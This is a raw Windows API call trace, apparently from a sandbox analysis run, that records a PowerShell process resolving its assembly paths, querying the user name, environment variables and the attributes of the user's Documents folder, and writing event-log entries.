	[0219.578] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x18caf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0221.791] CoTaskMemAlloc (cb=0x804) returned 0x1b923140
	[0221.791] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b923140, nSize=0x18d2f8 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x18d2f8) returned 0x1
	[0221.791] CoTaskMemFree (pv=0x1b923140) 
	[0221.791] CoTaskMemAlloc (cb=0x204) returned 0x2189c0
	[0221.791] GetUserNameW (in: lpBuffer=0x2189c0, pcbBuffer=0x18d338 | out: lpBuffer="aETAdzjz", pcbBuffer=0x18d338) returned 1
	[0221.792] CoTaskMemFree (pv=0x2189c0) 
	[0221.792] ReportEventW (hEventLog=0x1ba10008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2fc3f48*="Certificate", lpRawData=0x2fc3cd8) returned 1
	[0222.417] CoTaskMemAlloc (cb=0x104) returned 0x235590
	[0222.417] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x235590, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0222.417] CoTaskMemFree (pv=0x235590) 
	[0222.420] GetLogicalDrives () returned 0x4
	[0222.420] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x18cf80, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0222.420] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0222.421] CoTaskMemAlloc (cb=0x20e) returned 0x1b917dd0
	[0222.421] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x1b917dd0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents") returned 0x1b
	[0222.422] CoTaskMemFree (pv=0x1b917dd0) 
	[0222.423] CoTaskMemAlloc (cb=0x104) returned 0x235590
	[0222.423] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x235590, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0222.423] CoTaskMemFree (pv=0x235590) 
	[0222.423] CoTaskMemAlloc (cb=0x104) returned 0x235590
	[0222.423] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x235590, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0222.423] CoTaskMemFree (pv=0x235590) 
	[0222.440] CoTaskMemAlloc (cb=0x104) returned 0x235590
	[0222.440] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x235590, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0222.440] CoTaskMemFree (pv=0x235590) 
	[0222.445] CoTaskMemAlloc (cb=0x104) returned 0x235590
	[0222.445] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x235590, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0222.445] CoTaskMemFree (pv=0x235590) 
	[0222.446] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", nBufferLength=0x105, lpBuffer=0x18cce0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b
	[0222.446] SetErrorMode (uMode=0x1) returned 0x1
	[0222.446] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents" (normalized: "c:\\users\\aetadzjz\\documents"), fInfoLevelId=0x0, lpFileInformation=0x18cf40 | out: lpFileInformation=0x18cf40*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2335d4a0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7eb942d0, ftLastAccessTime.dwHighDateTime=0x1d543d1, ftLastWriteTime.dwLowDateTime=0x7eb942d0, ftLastWriteTime.dwHighDateTime=0x1d543d1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0222.447] SetErrorMode (uMode=0x1) returned 0x1
	[0222.447] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", nBufferLength=0x105, lpBuffer=0x18cce0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b
	[0222.447] SetErrorMode (uMode=0x1) returned 0x1
	[0222.447] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents" (normalized: "c:\\users\\aetadzjz\\documents"), fInfoLevelId=0x0, lpFileInformation=0x18cf40 | out: lpFileInformation=0x18cf40*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2335d4a0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7eb942d0, ftLastAccessTime.dwHighDateTime=0x1d543d1, ftLastWriteTime.dwLowDateTime=0x7eb942d0, ftLastWriteTime.dwHighDateTime=0x1d543d1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0222.447] SetErrorMode (uMode=0x1) returned 0x1
	[0222.448] CoTaskMemAlloc (cb=0x104) returned 0x235590
	[0222.448] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x235590, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0222.448] CoTaskMemFree (pv=0x235590) 
	[0223.163] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", nBufferLength=0x105, lpBuffer=0x18ce80, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b
	[0223.165] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x18ccf0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0223.165] SetErrorMode (uMode=0x1) returned 0x1
	[0223.165] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x18cf00 | out: lpFileInformation=0x18cf00*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0x6cd47e0, ftLastAccessTime.dwHighDateTime=0x1d337b1, ftLastWriteTime.dwLowDateTime=0x6cd47e0, ftLastWriteTime.dwHighDateTime=0x1d337b1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0223.166] SetErrorMode (uMode=0x1) returned 0x1
	[0223.166] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x18ccf0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0223.166] SetErrorMode (uMode=0x1) returned 0x1
	[0223.166] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x18cf00 | out: lpFileInformation=0x18cf00*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0x6cd47e0, ftLastAccessTime.dwHighDateTime=0x1d337b1, ftLastWriteTime.dwLowDateTime=0x6cd47e0, ftLastWriteTime.dwHighDateTime=0x1d337b1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0223.166] SetErrorMode (uMode=0x1) returned 0x1
	[0223.166] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x18cd00, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0223.166] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x18cbf0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0223.166] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0x18ccf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8
	[0223.166] SetErrorMode (uMode=0x1) returned 0x1
	[0223.166] GetFileAttributesExW (in: lpFileName="C:\\Users" (normalized: "c:\\users"), fInfoLevelId=0x0, lpFileInformation=0x18cf00 | out: lpFileInformation=0x18cf00*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2329edc0, ftLastAccessTime.dwHighDateTime=0x1d2f180, ftLastWriteTime.dwLowDateTime=0x2329edc0, ftLastWriteTime.dwHighDateTime=0x1d2f180, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0223.166] SetErrorMode (uMode=0x1) returned 0x1
	[0223.166] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0x18ccf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8
	[0223.167] SetErrorMode (uMode=0x1) returned 0x1
	[0223.167] GetFileAttributesExW (in: lpFileName="C:\\Users" (normalized: "c:\\users"), fInfoLevelId=0x0, lpFileInformation=0x18cf00 | out: lpFileInformation=0x18cf00*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2329edc0, ftLastAccessTime.dwHighDateTime=0x1d2f180, ftLastWriteTime.dwLowDateTime=0x2329edc0, ftLastWriteTime.dwHighDateTime=0x1d2f180, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0223.167] SetErrorMode (uMode=0x1) returned 0x1
	[0223.167] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0x18cd00, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8
	[0223.167] GetFullPathNameW (in: lpFileName="C:\\Users\\.", nBufferLength=0x105, lpBuffer=0x18cbf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8
	[0223.167] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz", nBufferLength=0x105, lpBuffer=0x18ccf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz", lpFilePart=0x0) returned 0x11
	[0223.167] SetErrorMode (uMode=0x1) returned 0x1
	[0223.167] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz" (normalized: "c:\\users\\aetadzjz"), fInfoLevelId=0x0, lpFileInformation=0x18cf00 | out: lpFileInformation=0x18cf00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2329edc0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7d929a80, ftLastAccessTime.dwHighDateTime=0x1d2f182, ftLastWriteTime.dwLowDateTime=0x7d929a80, ftLastWriteTime.dwHighDateTime=0x1d2f182, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0223.167] SetErrorMode (uMode=0x1) returned 0x1
	[0223.167] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz", nBufferLength=0x105, lpBuffer=0x18ccf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz", lpFilePart=0x0) returned 0x11
	[0223.167] SetErrorMode (uMode=0x1) returned 0x1
	[0223.167] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz" (normalized: "c:\\users\\aetadzjz"), fInfoLevelId=0x0, lpFileInformation=0x18cf00 | out: lpFileInformation=0x18cf00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2329edc0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7d929a80, ftLastAccessTime.dwHighDateTime=0x1d2f182, ftLastWriteTime.dwLowDateTime=0x7d929a80, ftLastWriteTime.dwHighDateTime=0x1d2f182, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0223.167] SetErrorMode (uMode=0x1) returned 0x1
	[0223.168] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz", nBufferLength=0x105, lpBuffer=0x18cd00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz", lpFilePart=0x0) returned 0x11
	[0223.168] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\.", nBufferLength=0x105, lpBuffer=0x18cbf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz", lpFilePart=0x0) returned 0x11
	[0223.168] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", nBufferLength=0x105, lpBuffer=0x18ccf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b
	[0223.168] SetErrorMode (uMode=0x1) returned 0x1
	[0223.168] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents" (normalized: "c:\\users\\aetadzjz\\documents"), fInfoLevelId=0x0, lpFileInformation=0x18cf00 | out: lpFileInformation=0x18cf00*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2335d4a0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7eb942d0, ftLastAccessTime.dwHighDateTime=0x1d543d1, ftLastWriteTime.dwLowDateTime=0x7eb942d0, ftLastWriteTime.dwHighDateTime=0x1d543d1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0223.168] SetErrorMode (uMode=0x1) returned 0x1
	[0223.168] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", nBufferLength=0x105, lpBuffer=0x18ccf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b
	[0223.168] SetErrorMode (uMode=0x1) returned 0x1
	[0223.168] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents" (normalized: "c:\\users\\aetadzjz\\documents"), fInfoLevelId=0x0, lpFileInformation=0x18cf00 | out: lpFileInformation=0x18cf00*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2335d4a0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7eb942d0, ftLastAccessTime.dwHighDateTime=0x1d543d1, ftLastWriteTime.dwLowDateTime=0x7eb942d0, ftLastWriteTime.dwHighDateTime=0x1d543d1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0223.168] SetErrorMode (uMode=0x1) returned 0x1
	[0223.168] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", nBufferLength=0x105, lpBuffer=0x18cd00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b
	[0223.168] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents\\.", nBufferLength=0x105, lpBuffer=0x18cbf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b
	[0223.169] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0x18cd30, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8
	[0223.169] SetErrorMode (uMode=0x1) returned 0x1
	[0223.169] GetFileAttributesExW (in: lpFileName="C:\\Users" (normalized: "c:\\users"), fInfoLevelId=0x0, lpFileInformation=0x18cf40 | out: lpFileInformation=0x18cf40*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2329edc0, ftLastAccessTime.dwHighDateTime=0x1d2f180, ftLastWriteTime.dwLowDateTime=0x2329edc0, ftLastWriteTime.dwHighDateTime=0x1d2f180, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0223.169] SetErrorMode (uMode=0x1) returned 0x1
	[0223.169] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0x18cd30, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8
	[0223.169] SetErrorMode (uMode=0x1) returned 0x1
	[0223.169] GetFileAttributesExW (in: lpFileName="C:\\Users" (normalized: "c:\\users"), fInfoLevelId=0x0, lpFileInformation=0x18cf40 | out: lpFileInformation=0x18cf40*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2329edc0, ftLastAccessTime.dwHighDateTime=0x1d2f180, ftLastWriteTime.dwLowDateTime=0x2329edc0, ftLastWriteTime.dwHighDateTime=0x1d2f180, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0223.169] SetErrorMode (uMode=0x1) returned 0x1
	[0223.169] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0x18cd40, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8
	[0223.169] GetFullPathNameW (in: lpFileName="C:\\Users\\.", nBufferLength=0x105, lpBuffer=0x18cc30, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8
	[0223.170] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz", nBufferLength=0x105, lpBuffer=0x18cd30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz", lpFilePart=0x0) returned 0x11
	[0223.170] SetErrorMode (uMode=0x1) returned 0x1
	[0223.170] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz" (normalized: "c:\\users\\aetadzjz"), fInfoLevelId=0x0, lpFileInformation=0x18cf40 | out: lpFileInformation=0x18cf40*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2329edc0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7d929a80, ftLastAccessTime.dwHighDateTime=0x1d2f182, ftLastWriteTime.dwLowDateTime=0x7d929a80, ftLastWriteTime.dwHighDateTime=0x1d2f182, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0223.170] SetErrorMode (uMode=0x1) returned 0x1
	[0223.170] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz", nBufferLength=0x105, lpBuffer=0x18cd30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz", lpFilePart=0x0) returned 0x11
	[0223.170] SetErrorMode (uMode=0x1) returned 0x1
	[0223.170] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz" (normalized: "c:\\users\\aetadzjz"), fInfoLevelId=0x0, lpFileInformation=0x18cf40 | out: lpFileInformation=0x18cf40*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2329edc0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7d929a80, ftLastAccessTime.dwHighDateTime=0x1d2f182, ftLastWriteTime.dwLowDateTime=0x7d929a80, ftLastWriteTime.dwHighDateTime=0x1d2f182, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0223.170] SetErrorMode (uMode=0x1) returned 0x1
	[0223.170] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz", nBufferLength=0x105, lpBuffer=0x18cd40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz", lpFilePart=0x0) returned 0x11
	[0223.170] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\.", nBufferLength=0x105, lpBuffer=0x18cc30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz", lpFilePart=0x0) returned 0x11
	[0223.170] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", nBufferLength=0x105, lpBuffer=0x18cd30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b
	[0223.170] SetErrorMode (uMode=0x1) returned 0x1
	[0223.171] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents" (normalized: "c:\\users\\aetadzjz\\documents"), fInfoLevelId=0x0, lpFileInformation=0x18cf40 | out: lpFileInformation=0x18cf40*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2335d4a0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7eb942d0, ftLastAccessTime.dwHighDateTime=0x1d543d1, ftLastWriteTime.dwLowDateTime=0x7eb942d0, ftLastWriteTime.dwHighDateTime=0x1d543d1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0223.171] SetErrorMode (uMode=0x1) returned 0x1
	[0223.171] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", nBufferLength=0x105, lpBuffer=0x18cd30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b
	[0223.171] SetErrorMode (uMode=0x1) returned 0x1
	[0223.171] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents" (normalized: "c:\\users\\aetadzjz\\documents"), fInfoLevelId=0x0, lpFileInformation=0x18cf40 | out: lpFileInformation=0x18cf40*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2335d4a0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7eb942d0, ftLastAccessTime.dwHighDateTime=0x1d543d1, ftLastWriteTime.dwLowDateTime=0x7eb942d0, ftLastWriteTime.dwHighDateTime=0x1d543d1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0223.171] SetErrorMode (uMode=0x1) returned 0x1
	[0223.171] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", nBufferLength=0x105, lpBuffer=0x18cd40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b
	[0223.171] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents\\.", nBufferLength=0x105, lpBuffer=0x18cc30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b
	[0223.180] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", nBufferLength=0x105, lpBuffer=0x18cfa0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b
	[0223.180] SetErrorMode (uMode=0x1) returned 0x1
	[0223.180] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents" (normalized: "c:\\users\\aetadzjz\\documents"), fInfoLevelId=0x0, lpFileInformation=0x18d200 | out: lpFileInformation=0x18d200*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2335d4a0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7eb942d0, ftLastAccessTime.dwHighDateTime=0x1d543d1, ftLastWriteTime.dwLowDateTime=0x7eb942d0, ftLastWriteTime.dwHighDateTime=0x1d543d1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0223.180] SetErrorMode (uMode=0x1) returned 0x1
	[0230.057] CoTaskMemAlloc (cb=0x804) returned 0x1b923140
	[0230.057] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b923140, nSize=0x18d568 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x18d568) returned 0x1
	[0230.058] CoTaskMemFree (pv=0x1b923140) 
	[0230.058] CoTaskMemAlloc (cb=0x204) returned 0x2189c0
	[0230.058] GetUserNameW (in: lpBuffer=0x2189c0, pcbBuffer=0x18d5a8 | out: lpBuffer="aETAdzjz", pcbBuffer=0x18d5a8) returned 1
	[0230.058] CoTaskMemFree (pv=0x2189c0) 
	[0230.060] ReportEventW (hEventLog=0x1ba10008, wType=0x4, wCategory=0x4, dwEventID=0x190, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3001010*="Available", lpRawData=0x3000da0) returned 1
	[0230.508] CoTaskMemAlloc (cb=0x104) returned 0x235590
	[0230.508] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x235590, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0230.508] CoTaskMemFree (pv=0x235590) 
	[0230.509] CoTaskMemAlloc (cb=0x104) returned 0x235590
	[0230.509] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x235590, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0230.509] CoTaskMemFree (pv=0x235590) 
	[0230.511] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18d070, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.511] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18cfc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.511] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18cfc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.515] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18cff0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.515] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18cf40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.515] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18cf40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.515] CoTaskMemAlloc (cb=0x104) returned 0x235590
	[0230.515] GetEnvironmentVariableW (in: lpName="HomeDrive", lpBuffer=0x235590, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0230.515] CoTaskMemFree (pv=0x235590) 
	[0230.515] CoTaskMemAlloc (cb=0x104) returned 0x235590
	[0230.515] GetEnvironmentVariableW (in: lpName="HomePath", lpBuffer=0x235590, nSize=0x80 | out: lpBuffer="\\Users\\aETAdzjz") returned 0xf
	[0230.516] CoTaskMemFree (pv=0x235590) 
	[0230.516] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18cff0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.516] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18cf40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.516] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18cf40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
